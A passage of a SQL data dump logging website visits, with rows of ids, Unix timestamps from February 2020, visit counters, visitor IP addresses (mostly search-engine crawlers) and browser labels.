1.101.23.83','chrome'),(479876,1581350970,1,1,0,0,'37.9.113.142','other'),(479877,1581351340,1,1,0,0,'66.249.64.26','chrome'),(479878,1581351630,1,1,0,0,'66.249.70.33','chrome'),(479879,1581351885,2,1,1,0,'207.46.13.168',''),(479880,1581351975,1,1,0,0,'141.8.142.2','other'),(479881,1581352216,1,1,0,0,'66.249.64.28','chrome'),(479882,1581352300,1,1,0,0,'141.8.142.132','other'),(479883,1581352304,1,1,0,0,'95.67.82.237','chrome'),(479884,1581352325,1,1,0,0,'91.124.183.1','chrome'),(479885,1581353331,1,1,0,0,'66.249.70.36','chrome'),(479886,1581353637,2,2,0,0,'66.249.64.28','chrome'),(479887,1581353729,1,1,0,0,'95.108.213.3','other'),(479888,1581353863,1,1,0,0,'178.154.171.134','other'),(479889,1581353873,2,2,0,0,'95.108.213.39','other'),(479890,1581354886,1,1,0,0,'13.66.139.0','other'),(479891,1581355385,1,1,0,0,'66.249.64.28','chrome'),(479892,1581355833,1,1,0,0,'207.46.13.203','other'),(479893,1581355916,1,1,0,0,'207.46.13.168','other'),(479894,1581355940,1,1,0,0,'66.249.64.26','chrome'),(479895,1581356539,2,2,0,0,'8.29.198.26','other'),(479896,1581356545,1,0,1,0,'66.249.64.27',''),(479897,1581356630,1,1,0,0,'37.9.113.33','other'),(479898,1581356910,2,2,0,0,'66.249.64.26','chrome'),(479899,1581356912,2,2,0,0,'207.46.13.168','other'),(479900,1581356940,2,2,0,0,'66.249.70.62','chrome'),(479901,1581356972,1,1,0,0,'178.154.171.7','other'),(479902,1581357157,3,3,0,0,'66.249.64.27','chrome'),(479903,1581357187,1,1,0,0,'37.9.113.142','other'),(479904,1581357220,2,2,0,0,'66.249.70.33','chrome'),(479905,1581358363,2,2,0,0,'66.249.64.28','chrome'),(479906,1581358531,1,1,0,0,'54.208.102.37','other'),(479907,1581358532,1,1,0,0,'107.21.1.8','other'),(479908,1581358775,1,1,0,0,'141.8.183.18','other'),(479909,1581359113,3,3,0,0,'66.249.64.26','chrome'),(479910,1581359345,1,1,0,0,'66.249.64.28','chrome'),(479911,1581360339,1,1,0,0,'91.209.11.236','other'),(479912,1581360349,1,1,0,0,'141.8.183.33','other'),(479913,1581360402,3,3,0,0,'66.249.64.27','chrome'),(479914,1581360439,2,2,0,0,'207.46.13.168','other'),(479915,1581360459,1,1,0,0,'66.249.64.26','chrome'),(479916,1581361271,4,4,0,0,'66.249.64.28','chrome'),(479917,1581361867,1,1,0,0,'66.249.64.27','chrome'),(479918,1581361954,4,4,0,0,'66.249.64.26','chrome'),(479919,1581362283,3,3,0,0,'66.249.64.28','chrome'),(479920,1581362340,1,1,0,0,'141.8.183.33','other'),(479921,1581362372,1,1,0,0,'207.46.13.168','other'),(479922,1581363203,2,1,1,0,'66.249.64.26',''),(479923,1581363295,2,2,0,0,'66.249.64.28','chrome'),(479924,1581363504,4,4,0,0,'66.249.64.27','chrome'),(479925,1581363636,1,1,0,0,'47.254.89.50','other'),(479926,1581363733,1,1,0,0,'66.249.70.33','chrome'),(479927,1581363837,2,2,0,0,'66.249.64.26','chrome'),(479928,1581364164,1,1,0,0,'66.249.70.36','chrome'),(479929,1581364360,1,1,0,0,'66.249.70.62','chrome'),(479930,1581364579,4,4,0,0,'66.249.64.28','chrome'),(479931,1581364967,2,2,0,0,'66.249.64.27','chrome'),(479932,1581365993,6,6,0,0,'66.249.64.27','chrome'),(479933,1581366030,6,6,0,0,'66.249.64.26','chrome'),(479934,1581366081,3,3,0,0,'66.249.64.28','chrome'),(479935,1581366087,3,3,0,0,'66.249.70.33','chrome'),(479936,1581366413,2,2,0,0,'95.213.141.126','opera'),(479937,1581366527,2,2,0,0,'66.249.70.62','chrome'),(479938,1581366984,4,4,0,0,'66.249.64.28','chrome'),(479939,1581367064,1,1,0,0,'66.249.70.33','chrome'),(479940,1581367349,2,2,0,0,'66.249.70.36','chrome'),(479941,1581367519,2,2,0,0,'66.249.64.27','chrome'),(479942,1581367570,2,2,0,0,'8.29.198.27','other'),(479943,1581367735,3,3,0,0,'66.249.64.26','chrome'),(479944,1581368065,1,1,0,0,'91.209.11.236','other'),(479945,1581368117,2,2,0,0,'66.249.64.28','chrome'),(479946,1581368746,2,2,0,0,'66.249.64.26','chrome'),(479947,1581369183,2,2,0,0,'66.249.70.33','chrome'),(479948,1581369364,2,2,0,0,'66.249.64.28','chrome'),(479949,1581369482,1,1,0,0,'66.249.70.62','chrome'),(479950,1581369708,3,3,0,0,'66.249.64.27','chrome'),(479951,1581369730,4,4,0,0,'66.249.64.26','chrome'),(479952,1581370113,1,1,0,0,'66.249.70.36','chrome'),(479953,1581370842,6,6,0,0,'66.249.64.26','chrome'),(479954,1581370874,2,2,0,0,'207.46.13.168','other'),(479955,1581371194,2,2,0,0,'91.209.11.236','other'),(479956,1581371286,1,1,0,0,'66.249.70.62','chrome'),(479957,1581371523,5,5,0,0,'66.249.64.27','chrome'),(479958,1581371719,2,2,0,0,'66.249.64.28','chrome'),(479959,1581372210,3,3,0,0,'66.249.70.33','chrome'),(479960,1581372370,1,1,0,0,'66.249.64.26','chrome'),(479961,1581373046,5,5,0,0,'66.249.64.27','chrome'),(479962,1581373666,2,2,0,0,'66.249.64.28','chrome'),(479963,1581373850,2,2,0,0,'66.249.70.36','chrome'),(479964,1581373989,3,3,0,0,'66.249.64.26','chrome'),(479965,1581374062,4,4,0,0,'66.249.64.27','chrome'),(479966,1581374457,1,1,0,0,'157.55.39.218','other'),(479967,1581374602,3,3,0,0,'66.249.64.28','chrome'),(479968,1581374609,1,1,0,0,'141.8.183.33','other'),(479969,1581374904,2,2,0,0,'66.249.64.26','chrome'),(479970,1581374975,1,1,0,0,'66.249.70.33','chrome'),(479971,1581375418,1,1,0,0,'141.8.132.9','other'),(479972,1581375630,2,2,0,0,'66.249.64.28','chrome'),(479973,1581375643,1,0,1,0,'157.55.39.53',''),(479974,1581376019,7,7,0,0,'66.249.64.26','chrome'),(479975,1581376062,4,4,0,0,'66.249.64.27','chrome'),(479976,1581376289,1,1,0,0,'66.249.70.33','chrome'),(479977,1581376337,1,1,0,0,'141.8.188.18','other'),(479978,1581376582,2,2,0,0,'66.249.64.28','chrome'),(479979,1581376795,2,2,0,0,'66.249.70.36','chrome'),(479980,1581377124,4,4,0,0,'66.249.64.26','chrome'),(479981,1581377376,2,2,0,0,'66.249.64.27','chrome'),(479982,1581378033,2,2,0,0,'66.249.64.28','chrome'),(479983,1581378512,2,2,0,0,'8.29.198.27','other'),(479984,1581378517,2,2,0,0,'66.249.64.27','chrome'),(479985,1581378570,1,1,0,0,'199.244.88.131','chrome'),(479986,1581378656,3,3,0,0,'66.249.64.26','chrome'),(479987,1581379295,1,1,0,0,'66.249.70.36','chrome'),(479988,1581379585,1,1,0,0,'66.249.64.28','chrome'),(479989,1581379837,1,1,0,0,'66.249.64.27','chrome'),(479990,1581380313,2,1,1,0,'66.249.64.26',''),(479991,1581380829,1,1,0,0,'141.8.183.53','other'),(479992,1581380848,1,1,0,0,'66.249.64.28','chrome'),(479993,1581381208,1,1,0,0,'66.249.64.27','chrome'),(479994,1581381214,1,1,0,0,'66.249.70.33','chrome'),(479995,1581381276,1,1,0,0,'157.55.39.218','other'),(479996,1581382089,4,4,0,0,'66.249.64.28','chrome'),(479997,1581382111,4,4,0,0,'66.249.64.26','chrome'),(479998,1581382112,3,3,0,0,'66.249.64.27','chrome'),(479999,1581382514,1,1,0,0,'62.205.134.182','other'),(480000,1581382601,1,1,0,0,'66.249.70.62','chrome'),(480001,1581382891,1,0,1,0,'157.55.39.218',''),(480002,1581383028,3,3,0,0,'66.249.64.26','chrome'),(480003,1581383213,2,2,0,0,'66.249.64.28','chrome'),(480004,1581383518,1,1,0,0,'66.249.70.62','chrome'),(480005,1581383852,4,4,0,0,'66.249.64.27','chrome'),(480006,1581383891,2,2,0,0,'66.249.70.33','chrome'),(480007,1581384389,1,1,0,0,'66.249.70.36','chrome'),(480008,1581384680,1,1,0,0,'66.249.70.62','chrome'),(480009,1581384695,1,1,0,0,'66.249.64.28','chrome'),(480010,1581386133,4,4,0,0,'66.249.64.27','chrome'),(480011,1581386624,1,1,0,0,'178.154.171.127','other'),(480012,1581386644,1,1,0,0,'141.8.183.33','other'),(480013,1581386885,1,1,0,0,'157.55.39.53','other'),(480014,1581386931,1,1,0,0,'207.46.13.159','other'),(480015,1581387049,2,2,0,0,'66.249.64.26','chrome'),(480016,1581387590,2,2,0,0,'66.249.64.27','chrome'),(480017,1581387613,3,3,0,0,'66.249.64.28','chrome'),(480018,1581387786,1,1,0,0,'66.249.70.33','chrome'),(480019,1581388011,1,1,0,0,'157.55.39.218','other'),(480020,1581388140,4,4,0,0,'66.249.64.26','chrome'),(480021,1581388186,1,1,0,0,'141.8.183.33','chrome'),(480022,1581388602,1,1,0,0,'66.249.64.28','chrome'),(480023,1581388758,3,3,0,0,'66.249.64.27','chrome'),(480024,1581388980,1,1,0,0,'66.249.70.33','chrome'),(480025,1581389017,1,1,0,0,'66.249.70.62','chrome'),(480026,1581389494,1,1,0,0,'8.29.198.25','other'),(480027,1581389907,3,3,0,0,'66.249.64.28','chrome'),(480028,1581389934,3,3,0,0,'66.249.64.27','chrome'),(480029,1581390061,3,3,0,0,'66.249.64.26','chrome'),(480030,1581390119,1,1,0,0,'8.29.198.27','other'),(480031,1581390430,1,1,0,0,'207.46.13.202','other'),(480032,1581391008,2,2,0,0,'66.249.64.26','chrome'),(480033,1581391028,1,1,0,0,'66.249.64.27','chrome'),(480034,1581391130,1,1,0,0,'95.108.213.3','other'),(480035,1581391925,3,2,1,0,'66.249.64.26',''),(480036,1581392247,1,1,0,0,'66.249.70.62','chrome'),(480037,1581392296,1,1,0,0,'5.45.207.65','other'),(480038,1581392427,1,1,0,0,'66.249.64.27','chrome'),(480039,1581392938,3,3,0,0,'66.249.64.28','chrome'),(480040,1581393004,1,1,0,0,'66.249.70.33','chrome'),(480041,1581393422,3,3,0,0,'66.249.64.27','chrome'),(480042,1581393487,1,1,0,0,'66.249.64.26','chrome'),(480043,1581394351,2,2,0,0,'66.249.64.28','chrome'),(480044,1581394524,2,0,2,0,'66.249.64.26',''),(480045,1581395049,1,1,0,0,'66.249.64.27','chrome'),(480046,1581395510,1,0,1,0,'207.46.13.159',''),(480047,1581396226,3,3,0,0,'66.249.64.26','chrome'),(480048,1581396491,1,1,0,0,'54.203.98.101','chrome'),(480049,1581396495,1,1,0,0,'35.162.70.167','other'),(480050,1581396745,1,1,0,0,'66.249.64.28','chrome'),(480051,1581396915,1,1,0,0,'178.154.171.127','other'),(480052,1581397635,1,0,1,0,'66.249.64.26',''),(480053,1581399828,1,1,0,0,'62.205.134.182','other'),(480054,1581400340,1,1,0,0,'66.249.64.28','chrome'),(480055,1581400501,1,1,0,0,'8.29.198.26','other'),(480056,1581400999,1,1,0,0,'66.249.64.27','chrome'),(480057,1581401095,1,1,0,0,'8.29.198.25','other'),(480058,1581401347,2,2,0,0,'66.249.70.62','chrome'),(480059,1581401721,1,1,0,0,'66.249.64.26','chrome'),(480060,1581401781,1,1,0,0,'66.249.64.28','chrome'),(480061,1581402423,1,1,0,0,'31.13.127.16','other'),(480062,1581402424,1,1,0,0,'31.13.127.14','other'),(480063,1581402547,1,1,0,0,'91.196.178.86','firefox'),(480064,1581403192,3,3,0,0,'66.249.64.27','chrome'),(480065,1581403679,1,1,0,0,'91.196.178.168','chrome'),(480066,1581403797,1,1,0,0,'141.8.188.20','other'),(480067,1581403902,3,3,0,0,'66.249.70.62','chrome'),(480068,1581404280,3,3,0,0,'66.249.70.36','chrome'),(480069,1581404310,1,1,0,0,'66.249.64.26','chrome'),(480070,1581404446,1,1,0,0,'91.196.178.76','chrome'),(480071,1581405251,4,4,0,0,'66.249.64.26','chrome'),(480072,1581405924,1,1,0,0,'188.163.54.86','firefox'),(480073,1581405951,3,3,0,0,'66.249.64.28','chrome'),(480074,1581406412,1,1,0,0,'37.9.113.33','other'),(480075,1581406907,3,1,2,0,'66.249.64.26',''),(480076,1581407024,1,1,0,0,'191.102.167.84','chrome'),(480077,1581407299,2,2,0,0,'66.249.64.27','chrome'),(480078,1581408144,1,1,0,0,'141.8.142.115','other'),(480079,1581408469,2,1,1,0,'66.249.64.28',''),(480080,1581408701,3,3,0,0,'66.249.70.33','chrome'),(480081,1581408753,6,5,1,0,'66.249.64.27',''),(480082,1581408935,1,1,0,0,'141.8.183.67','other'),(480083,1581409110,2,0,2,0,'66.249.64.26',''),(480084,1581409122,1,1,0,0,'207.46.13.202','other'),(480085,1581409408,6,6,0,0,'66.249.64.28','chrome'),(480086,1581409421,3,3,0,0,'66.249.70.36','chrome'),(480087,1581409432,2,1,1,0,'66.249.64.26',''),(480088,1581409462,7,7,0,0,'66.249.70.62','chrome'),(480089,1581409491,2,2,0,0,'91.196.178.86','firefox'),(480090,1581409509,6,5,1,0,'66.249.64.26',''),(480091,1581409640,4,4,0,0,'66.249.70.33','chrome'),(480092,1581409643,4,3,1,0,'66.249.64.26',''),(480093,1581409858,3,2,1,0,'66.249.64.27',''),(480094,1581409923,2,2,0,0,'66.249.64.26','chrome'),(480095,1581409930,2,2,0,0,'66.249.64.27','chrome'),(480096,1581409954,1,1,0,0,'141.101.23.83','chrome'),(480097,1581410370,1,1,0,0,'46.211.220.109','chrome'),(480098,1581410418,1,1,0,0,'66.249.70.36','chrome'),(480099,1581410623,1,1,0,0,'207.46.13.202','other'),(480100,1581410930,1,1,0,0,'66.102.9.161','chrome'),(480101,1581410989,1,1,0,0,'37.9.113.33','other'),(480102,1581411057,1,0,1,0,'66.249.64.27',''),(480103,1581411262,6,6,0,0,'66.249.64.26','chrome'),(480104,1581411336,1,1,0,0,'66.249.64.28','chrome'),(480105,1581411467,1,1,0,0,'66.249.70.36','chrome'),(480106,1581411545,1,1,0,0,'207.46.13.159','other'),(480107,1581411551,3,3,0,0,'66.249.64.27','chrome'),(480108,1581411593,1,1,0,0,'8.29.198.25','other'),(480109,1581412140,1,1,0,0,'8.29.198.27','other'),(480110,1581412325,2,1,1,0,'66.249.64.26',''),(480111,1581412620,2,2,0,0,'66.249.70.62','chrome'),(480112,1581412635,2,2,0,0,'66.249.64.27','chrome'),(480113,1581412840,1,1,0,0,'141.8.183.33','other'),(480114,1581412980,1,1,0,0,'66.249.70.36','chrome'),(480115,1581413312,2,2,0,0,'66.249.64.26','chrome'),(480116,1581413512,1,1,0,0,'141.8.132.9','other'),(480117,1581413710,2,2,0,0,'66.249.64.27','chrome'),(480118,1581414560,1,1,0,0,'66.249.70.36','chrome'),(480119,1581414641,1,1,0,0,'37.9.113.39','other'),(480120,1581415073,1,1,0,0,'66.249.64.28','chrome'),(480121,1581415181,1,1,0,0,'37.9.113.6','other'),(480122,1581415183,1,1,0,0,'141.8.142.128','other'),(480123,1581415277,2,2,0,0,'66.249.70.62','chrome'),(480124,1581415404,1,1,0,0,'18.223.24.65','chrome'),(480125,1581416392,1,0,1,0,'66.249.64.26',''),(480126,1581417943,1,1,0,0,'66.249.70.36','chrome'),(480127,1581418270,1,1,0,0,'66.249.64.27','chrome'),(480128,1581418289,1,1,0,0,'95.24.31.202','chrome'),(480129,1581418375,1,1,0,0,'91.196.178.86','firefox'),(480130,1581419215,1,1,0,0,'66.249.64.27','chrome'),(480131,1581419312,2,1,1,0,'66.249.64.28',''),(480132,1581419343,2,2,0,0,'66.249.64.26','chrome'),(480133,1581419358,1,1,0,0,'66.249.70.33','chrome'),(480134,1581420211,2,2,0,0,'66.249.64.28','chrome'),(480135,1581420364,1,1,0,0,'66.249.70.33','chrome'),(480136,1581421484,1,0,1,0,'66.249.64.27',''),(480137,1581421547,1,0,1,0,'207.46.13.159',''),(480138,1581421599,2,2,0,0,'66.249.64.28','chrome'),(480139,1581421696,1,1,0,0,'109.74.154.72','chrome'),(480140,1581421990,1,1,0,0,'66.249.70.62','chrome'),(480141,1581422142,3,2,1,0,'66.249.64.27',''),(480142,1581422941,1,1,0,0,'8.29.198.27','other'),(480143,1581423023,1,1,0,0,'66.249.70.33','chrome'),(480144,1581423073,5,5,0,0,'66.249.64.27','chrome'),(480145,1581423120,2,2,0,0,'66.249.64.28','chrome'),(480146,1581423166,1,1,0,0,'66.249.64.26','chrome'),(480147,1581423456,1,1,0,0,'8.29.198.26','other'),(480148,1581424134,1,1,0,0,'91.196.178.74','chrome'),(480149,1581424264,4,4,0,0,'66.249.64.26','chrome'),(480150,1581424839,3,3,0,0,'66.249.64.28','chrome'),(480151,1581425266,1,1,0,0,'66.249.64.27','chrome'),(480152,1581425271,2,2,0,0,'66.249.64.26','chrome'),(480153,1581425509,3,3,0,0,'66.249.70.33','chrome'),(480154,1581425900,1,1,0,0,'37.9.113.200','other'),(480155,1581426097,1,1,0,0,'66.249.70.36','chrome'),(480156,1581426161,5,5,0,0,'66.249.64.28','chrome'),(480157,1581426196,10,10,0,0,'66.249.64.26','chrome'),(480158,1581426230,1,1,0,0,'91.196.178.76','chrome'),(480159,1581426342,2,2,0,0,'66.249.64.27','chrome'),(480160,1581426591,1,1,0,0,'66.249.70.33','chrome'),(480161,1581427105,2,2,0,0,'66.249.64.28','chrome'),(480162,1581427129,5,5,0,0,'66.249.64.26','chrome'),(480163,1581427190,1,1,0,0,'141.8.142.161','other'),(480164,1581427507,1,1,0,0,'66.249.70.36','chrome'),(480165,1581428102,5,5,0,0,'66.249.64.26','chrome'),(480166,1581428467,3,3,0,0,'66.249.64.28','chrome'),(480167,1581428473,1,0,1,0,'66.249.64.27',''),(480168,1581429025,3,3,0,0,'66.249.64.26','chrome'),(480169,1581429171,2,2,0,0,'66.249.70.33','chrome'),(480170,1581429434,1,1,0,0,'13.66.139.0','other'),(480171,1581430033,2,2,0,0,'66.249.64.26','chrome'),(480172,1581430404,1,1,0,0,'66.249.64.28','chrome'),(480173,1581430448,1,1,0,0,'66.249.70.33','chrome'),(480174,1581431484,1,1,0,0,'195.60.231.136','chrome'),(480175,1581431628,1,1,0,0,'66.249.70.62','chrome'),(480176,1581431987,1,1,0,0,'95.108.181.104','other'),(480177,1581432243,4,4,0,0,'66.249.64.27','chrome'),(480178,1581432310,2,2,0,0,'66.249.64.28','chrome'),(480179,1581432325,1,1,0,0,'91.196.178.86','chrome'),(480180,1581432339,1,1,0,0,'66.249.64.26','chrome'),(480181,1581433004,2,2,0,0,'31.13.103.28','other'),(480182,1581433217,1,1,0,0,'66.249.64.28','chrome'),(480183,1581433438,2,2,0,0,'66.249.64.26','chrome'),(480184,1581433471,1,1,0,0,'66.249.70.33','chrome'),(480185,1581433794,2,2,0,0,'66.249.64.27','chrome'),(480186,1581433830,1,1,0,0,'5.45.207.44','other'),(480187,1581434579,1,1,0,0,'8.29.198.26','other'),(480188,1581434944,1,1,0,0,'207.46.13.159','other'),(480189,1581435415,2,2,0,0,'66.249.70.62','chrome'),(480190,1581435426,1,1,0,0,'66.249.70.36','chrome'),(480191,1581435623,1,1,0,0,'66.249.64.26','chrome'),(480192,1581436145,1,1,0,0,'8.29.198.27','other'),(480193,1581436546,1,1,0,0,'66.249.70.36','chrome'),(480194,1581436559,1,1,0,0,'66.249.64.27','chrome'),(480195,1581436860,1,1,0,0,'66.249.64.26','chrome'),(480196,1581438236,3,3,0,0,'66.249.64.28','chrome'),(480197,1581438549,1,1,0,0,'66.249.70.36','chrome'),(480198,1581438634,2,2,0,0,'66.249.64.27','chrome'),(480199,1581438675,1,1,0,0,'91.196.178.183','chrome'),(480200,1581439213,1,1,0,0,'66.249.70.62','chrome'),(480201,1581439485,1,1,0,0,'66.249.64.26','chrome'),(480202,1581439826,2,2,0,0,'66.249.64.27','chrome'),(480203,1581439907,2,2,0,0,'66.249.64.28','chrome'),(480204,1581440496,1,1,0,0,'66.249.70.62','chrome'),(480205,1581440814,2,2,0,0,'66.249.64.26','chrome'),(480206,1581441160,1,1,0,0,'66.249.70.33','chrome'),(480207,1581441342,3,3,0,0,'66.249.64.28','chrome'),(480208,1581441452,1,1,0,0,'66.249.70.62','chrome'),(480209,1581441784,3,3,0,0,'66.249.64.27','chrome'),(480210,1581441933,1,1,0,0,'66.249.70.36','chrome'),(480211,1581442328,2,2,0,0,'66.249.70.33','chrome'),(480212,1581442561,3,3,0,0,'66.249.64.26','chrome'),(480213,1581443494,1,0,1,0,'66.249.64.26',''),(480214,1581443655,2,2,0,0,'66.249.70.62','chrome'),(480215,1581443690,4,4,0,0,'66.249.64.26','chrome'),(480216,1581443704,1,1,0,0,'66.249.64.28','chrome'),(480217,1581443764,1,1,0,0,'66.249.64.27','chrome'),(480218,1581444000,1,1,0,0,'66.249.70.36','chrome'),(480219,1581444271,1,1,0,0,'91.196.178.183','chrome'),(480220,1581444806,1,0,1,0,'66.249.70.33',''),(480221,1581444899,1,1,0,0,'66.249.64.27','chrome'),(480222,1581445893,1,1,0,0,'66.249.70.36','chrome'),(480223,1581446059,1,1,0,0,'8.29.198.27','other'),(480224,1581446174,2,2,0,0,'66.249.64.28','chrome'),(480225,1581446410,1,1,0,0,'94.153.106.25','chrome'),(480226,1581446658,1,1,0,0,'95.108.213.55','other'),(480227,1581446677,1,1,0,0,'207.46.13.159','other'),(480228,1581447181,1,1,0,0,'46.211.239.157','chrome'),(480229,1581447233,2,0,2,0,'66.249.64.26',''),(480230,1581447259,2,2,0,0,'66.249.70.33','chrome'),(480231,1581447339,4,4,0,0,'66.249.64.26','chrome'),(480232,1581447340,2,2,0,0,'66.249.64.27','chrome'),(480233,1581447483,1,1,0,0,'8.29.198.25','other'),(480234,1581447493,5,5,0,0,'66.249.64.28','chrome'),(480235,1581447912,2,2,0,0,'207.46.13.130','other'),(480236,1581448173,1,1,0,0,'66.249.70.36','chrome'),(480237,1581448637,3,3,0,0,'66.249.64.26','chrome'),(480238,1581448643,1,1,0,0,'66.249.64.27','chrome'),(480239,1581448748,1,1,0,0,'66.249.64.28','chrome'),(480240,1581449433,1,1,0,0,'66.249.70.33','chrome'),(480241,1581449685,3,3,0,0,'66.249.64.28','chrome'),(480242,1581449961,1,1,0,0,'66.249.64.27','chrome'),(480243,1581450563,1,0,1,0,'66.249.70.33',''),(480244,1581450706,1,0,1,0,'66.249.64.26',''),(480245,1581450820,1,1,0,0,'141.8.188.25','other'),(480246,1581450956,2,2,0,0,'66.249.64.27','chrome'),(480247,1581450961,1,1,0,0,'66.249.70.36','chrome'),(480248,1581451030,2,2,0,0,'207.46.13.130','other'),(480249,1581452105,1,1,0,0,'66.249.64.26','chrome'),(480250,1581452207,1,1,0,0,'207.46.13.130','other'),(480251,1581452604,1,0,1,0,'66.249.64.27',''),(480252,1581452914,1,1,0,0,'141.8.142.119','other'),(480253,1581452961,1,1,0,0,'66.249.70.62','chrome'),(480254,1581453180,2,2,0,0,'66.249.64.28','chrome'),(480255,1581453339,3,3,0,0,'66.249.64.26','chrome'),(480256,1581453790,2,1,1,0,'66.249.64.27',''),(480257,1581453981,1,1,0,0,'207.46.13.159','other'),(480258,1581454216,1,1,0,0,'116.193.170.50','chrome'),(480259,1581454336,1,0,1,0,'66.249.64.26',''),(480260,1581454600,1,1,0,0,'66.249.64.26','chrome'),(480261,1581454605,2,2,0,0,'66.249.64.27','chrome'),(480262,1581455008,1,1,0,0,'95.55.99.129','chrome'),(480263,1581455031,2,2,0,0,'66.249.70.36','chrome'),(480264,1581456303,8,8,0,0,'66.249.64.26','chrome'),(480265,1581456828,1,1,0,0,'66.249.64.28','chrome'),(480266,1581457220,1,1,0,0,'8.29.198.25','other'),(480267,1581457359,2,2,0,0,'66.249.64.27','chrome'),(480268,1581457385,3,3,0,0,'66.249.64.26','chrome'),(480269,1581457927,1,0,1,0,'66.249.64.28',''),(480270,1581458379,2,2,0,0,'66.249.64.26','chrome'),(480271,1581458533,1,1,0,0,'8.29.198.27','other'),(480272,1581458669,1,1,0,0,'66.249.64.28','chrome'),(480273,1581458763,1,1,0,0,'207.46.13.130','other'),(480274,1581459144,3,3,0,0,'51.83.200.186','other'),(480275,1581459166,1,1,0,0,'66.249.64.27','chrome'),(480276,1581459728,1,0,1,0,'66.249.64.26',''),(480277,1581459754,1,1,0,0,'207.46.13.130','other'),(480278,1581459857,2,2,0,0,'66.249.64.26','chrome'),(480279,1581459964,3,3,0,0,'66.249.64.28','chrome'),(480280,1581459993,1,1,0,0,'66.249.70.62','chrome'),(480281,1581460399,2,2,0,0,'66.249.64.27','chrome'),(480282,1581460863,1,1,0,0,'66.249.64.26','chrome'),(480283,1581460933,1,0,1,0,'207.46.13.130',''),(480284,1581461921,1,1,0,0,'66.249.70.36','chrome'),(480285,1581462010,1,0,1,0,'207.46.13.130',''),(480286,1581462044,1,1,0,0,'66.249.70.33','chrome'),(480287,1581462618,1,1,0,0,'207.46.13.130','other'),(480288,1581462997,1,1,0,0,'66.249.64.27','chrome'),(480289,1581463597,1,0,1,0,'66.249.64.28',''),(480290,1581463721,3,3,0,0,'207.46.13.130','other'),(480291,1581463722,1,1,0,0,'66.249.64.28','chrome'),(480292,1581465388,1,1,0,0,'157.245.12.129','firefox'),(480293,1581465389,1,1,0,0,'66.249.64.28','chrome'),(480294,1581465948,1,1,0,0,'141.8.142.128','other'),(480295,1581467289,1,1,0,0,'66.249.64.28','chrome'),(480296,1581467328,1,1,0,0,'95.108.181.104','other'),(480297,1581468334,1,1,0,0,'207.46.13.130','other'),(480298,1581468354,1,1,0,0,'8.29.198.26','other'),(480299,1581468376,1,1,0,0,'141.8.183.111','other'),(480300,1581468914,1,1,0,0,'62.205.134.182','other'),(480301,1581469481,1,1,0,0,'66.249.70.36','chrome'),(480302,1581469588,1,1,0,0,'8.29.198.26','other'),(480303,1581470953,1,1,0,0,'66.249.64.28','chrome'),(480304,1581471235,2,2,0,0,'66.249.64.27','chrome'),(480305,1581471628,1,1,0,0,'88.154.240.212','chrome'),(480306,1581472884,1,1,0,0,'66.249.64.28','chrome'),(480307,1581473088,1,1,0,0,'66.249.64.27','chrome'),(480308,1581473329,1,1,0,0,'207.46.13.159','other'),(480309,1581473365,1,1,0,0,'66.249.70.36','chrome'),(480310,1581475163,1,1,0,0,'207.46.13.159','other'),(480311,1581475641,1,1,0,0,'66.249.64.28','chrome'),(480312,1581476179,1,1,0,0,'207.46.13.130','other'),(480313,1581476277,1,1,0,0,'66.249.75.190','chrome'),(480314,1581476495,1,1,0,0,'141.8.142.128','other'),(480315,1581476551,1,1,0,0,'66.249.69.126','chrome'),(480316,1581477858,1,0,1,0,'66.249.69.15',''),(480317,1581477916,1,1,0,0,'66.249.69.94','chrome'),(480318,1581477951,1,1,0,0,'66.249.69.253','chrome'),(480319,1581478140,1,1,0,0,'66.249.69.162','chrome'),(480320,1581478357,1,1,0,0,'52.43.151.91','chrome'),(480321,1581478360,1,1,0,0,'35.162.70.167','other'),(480322,1581478363,1,1,0,0,'66.249.69.19','chrome'),(480323,1581478399,1,1,0,0,'141.8.132.31','other'),(480324,1581478615,1,1,0,0,'66.249.69.126','chrome'),(480325,1581478946,2,2,0,0,'66.249.69.97','chrome'),(480326,1581479311,1,1,0,0,'66.249.72.3','chrome'),(480327,1581479357,1,1,0,0,'66.249.75.253','chrome'),(480328,1581479483,1,1,0,0,'8.29.198.26','other'),(480329,1581479583,1,1,0,0,'66.249.69.197','chrome'),(480330,1581479865,1,1,0,0,'66.249.69.126','chrome'),(480331,1581480067,1,1,0,0,'66.249.69.94','chrome'),(480332,1581480124,1,1,0,0,'66.249.75.98','chrome'),(480333,1581480250,1,1,0,0,'66.249.75.44','chrome'),(480334,1581480418,2,2,0,0,'66.249.75.74','chrome'),(480335,1581480537,1,1,0,0,'207.46.13.63','other'),(480336,1581480575,1,1,0,0,'66.249.75.136','chrome'),(480337,1581480619,1,1,0,0,'8.29.198.26','other'),(480338,1581481495,3,3,0,0,'66.249.75.74','chrome'),(480339,1581481564,3,3,0,0,'66.249.69.100','chrome'),(480340,1581481856,2,1,1,0,'207.46.13.63',''),(480341,1581481873,1,1,0,0,'66.249.75.76','chrome'),(480342,1581481918,1,1,0,0,'66.249.69.126','chrome'),(480343,1581482479,4,4,0,0,'66.249.75.74','chrome'),(480344,1581482603,2,2,0,0,'207.46.13.63','other'),(480345,1581483034,1,1,0,0,'2.35.78.250','chrome'),(480346,1581483212,3,3,0,0,'66.249.75.76','chrome'),(480347,1581483335,3,3,0,0,'66.249.75.72','chrome'),(480348,1581483392,1,1,0,0,'66.249.69.97','chrome'),(480349,1581483671,2,2,0,0,'66.249.75.74','chrome'),(480350,1581484130,3,3,0,0,'66.249.75.76','chrome'),(480351,1581484395,1,1,0,0,'66.249.69.100','chrome'),(480352,1581484412,3,3,0,0,'66.249.75.72','chrome'),(480353,1581484415,2,2,0,0,'66.249.69.97','chrome'),(480354,1581484587,3,3,0,0,'66.249.69.126','chrome'),(480355,1581485118,2,2,0,0,'66.249.75.76','chrome'),(480356,1581485162,8,8,0,0,'66.249.75.74','chrome'),(480357,1581485326,9,9,0,0,'66.249.75.72','chrome'),(480358,1581485605,1,1,0,0,'66.249.69.100','chrome'),(480359,1581485641,3,3,0,0,'66.249.69.97','chrome'),(480360,1581486067,2,2,0,0,'66.249.75.74','chrome'),(480361,1581486104,1,1,0,0,'62.205.134.182','other'),(480362,1581486422,1,1,0,0,'66.249.75.72','chrome'),(480363,1581486839,1,1,0,0,'207.46.13.63','other'),(480364,1581487697,1,1,0,0,'91.196.178.76','firefox'),(480365,1581488574,3,3,0,0,'66.249.75.74','chrome'),(480366,1581488755,6,6,0,0,'66.249.75.76','chrome'),(480367,1581488950,1,1,0,0,'37.9.113.39','other'),(480368,1581489111,5,5,0,0,'66.249.75.72','chrome'),(480369,1581489469,1,1,0,0,'66.249.69.100','chrome'),(480370,1581489474,2,2,0,0,'66.249.69.126','c